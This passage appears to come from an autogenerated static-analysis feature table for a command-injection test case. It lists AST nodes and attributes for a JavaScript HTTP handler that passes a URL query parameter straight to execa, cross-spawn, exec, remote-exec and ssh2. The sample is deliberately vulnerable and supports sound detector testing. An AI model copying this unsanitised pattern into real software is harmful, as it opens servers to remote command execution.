cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:11 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:11 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:11 | require | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:11 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:11 | require | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:20 | exceptional return of require("execa") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:20 | exceptional return of require("execa") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:20 | exceptional return of require("execa") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:20 | exceptional return of require("execa") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:20 | exceptional return of require("execa") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:20 | require("execa") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:20 | require("execa") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:20 | require("execa") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:20 | require("execa") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:20 | require("execa") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:27 | require ... .stderr | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:27 | require ... .stderr | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:27 | require ... .stderr | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:27 | require ... .stderr | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:27 | require ... .stderr | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:32 | exceptional return of require ... rr(cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:32 | exceptional return of require ... rr(cmd) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:32 | exceptional return of require ... rr(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:32 | exceptional return of require ... rr(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:32 | exceptional return of require ... rr(cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:32 | require ... rr(cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:32 | require ... rr(cmd) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:32 | require ... rr(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:32 | require ... rr(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:32 | require ... rr(cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:13:11:19 | "execa" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:13:11:19 | "execa" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:13:11:19 | "execa" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:13:11:19 | "execa" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:13:11:19 | "execa" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:13:11:19 | "execa" | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:13:11:19 | "execa" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:13:11:19 | "execa" | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:22:11:27 | stderr | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:22:11:27 | stderr | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:22:11:27 | stderr | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:22:11:27 | stderr | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:22:11:27 | stderr | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:29:11:31 | cmd | CalleeFlexibleAccessPath | import(!).stderr | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:29:11:31 | cmd | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:29:11:31 | cmd | calleeImports | execa | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:29:11:31 | cmd | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:29:11:31 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:29:11:31 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:29:11:31 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:29:11:31 | cmd | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:11 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:11 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:11 | require | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:11 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:11 | require | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:20 | exceptional return of require("execa") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:20 | exceptional return of require("execa") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:20 | exceptional return of require("execa") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:20 | exceptional return of require("execa") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:20 | exceptional return of require("execa") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:20 | require("execa") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:20 | require("execa") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:20 | require("execa") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:20 | require("execa") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:20 | require("execa") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:25 | require ... ").sync | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:25 | require ... ").sync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:25 | require ... ").sync | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:25 | require ... ").sync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:25 | require ... ").sync | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:30 | exceptional return of require ... nc(cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:30 | exceptional return of require ... nc(cmd) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:30 | exceptional return of require ... nc(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:30 | exceptional return of require ... nc(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:30 | exceptional return of require ... nc(cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:30 | require ... nc(cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:30 | require ... nc(cmd) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:30 | require ... nc(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:30 | require ... nc(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:30 | require ... nc(cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:13:12:19 | "execa" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:13:12:19 | "execa" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:13:12:19 | "execa" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:13:12:19 | "execa" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:13:12:19 | "execa" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:13:12:19 | "execa" | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:13:12:19 | "execa" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:13:12:19 | "execa" | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:22:12:25 | sync | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:22:12:25 | sync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:22:12:25 | sync | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:22:12:25 | sync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:22:12:25 | sync | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:27:12:29 | cmd | CalleeFlexibleAccessPath | import(!).sync | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:27:12:29 | cmd | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:27:12:29 | cmd | calleeImports | execa | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:27:12:29 | cmd | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:27:12:29 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:27:12:29 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:27:12:29 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:27:12:29 | cmd | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:5:14:11 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:5:14:11 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:5:14:11 | require | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:5:14:11 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:5:14:11 | require | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:5:14:26 | exceptional return of require ... spawn") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:5:14:26 | exceptional return of require ... spawn") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:5:14:26 | exceptional return of require ... spawn") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:5:14:26 | exceptional return of require ... spawn") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:5:14:26 | exceptional return of require ... spawn") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:5:14:26 | require ... spawn") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:5:14:26 | require ... spawn") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:5:14:26 | require ... spawn") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:5:14:26 | require ... spawn") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:5:14:26 | require ... spawn") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:5:14:31 | exceptional return of require ... ")(cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:5:14:31 | exceptional return of require ... ")(cmd) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:5:14:31 | exceptional return of require ... ")(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:5:14:31 | exceptional return of require ... ")(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:5:14:31 | exceptional return of require ... ")(cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:5:14:31 | require ... ")(cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:5:14:31 | require ... ")(cmd) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:5:14:31 | require ... ")(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd 